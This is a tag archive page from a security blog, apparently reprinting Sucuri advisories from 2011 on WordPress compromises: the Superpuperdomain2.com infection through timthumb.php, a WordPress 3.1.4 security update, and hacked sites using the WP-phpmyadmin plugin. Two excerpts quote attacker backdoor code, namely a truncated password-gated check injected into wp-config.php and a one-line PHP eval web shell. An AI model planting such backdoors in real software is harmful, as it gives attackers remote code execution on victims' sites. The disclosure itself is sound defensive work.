wp | DataProtectionCenter.com – Tech and Security

Update to the Superpuperdomain2.com malware

15

Aug

2011

Just a quick update to the Superpuperdomain2.com/Superpuperdomain.com malware infection that has been affecting thousands of WordPress sites with the vulnerable timthumb.php script. You can read more about it here: http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain2-com.html But now the attackers are also adding the following code to the wp-config.php of the hacked sites: if (isset($_GET[‘pingnow’])&& isset($_GET[‘pass’])){ if ($_GET[‘pass’] == ’66f041e16a60928b05a7e228a89c3799′){ if […]

Category Security Written by Sucuri 0 Comments

WordPress 3.1.4 available – Time to update

30

Jun

2011

If you are running WordPress, it is time to update it now. WordPress v3.1.4 was just released with security fixes for all the previous versions (specially important with you have users with the editor-level permissions): From the WordPress blog: WordPress 3.1.4 is available now and is a maintenance and security update for all previous versions. […]

Category Security Written by Sucuri 0 Comments

WP-phpmyadmin WordPress plugin – Delete it now

23

Jun

2011

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on. On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file: <?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?> This is not part of the plugin, and should be removed […]

Category Security Written by Sucuri 0 Comments

The Latest in IT Security

Posts Tagged ‘wp’

Update to the Superpuperdomain2.com malware

WordPress 3.1.4 available – Time to update

WP-phpmyadmin WordPress plugin – Delete it now

Categories

Featured

Archives

Latest Comments

About Us

Contact Us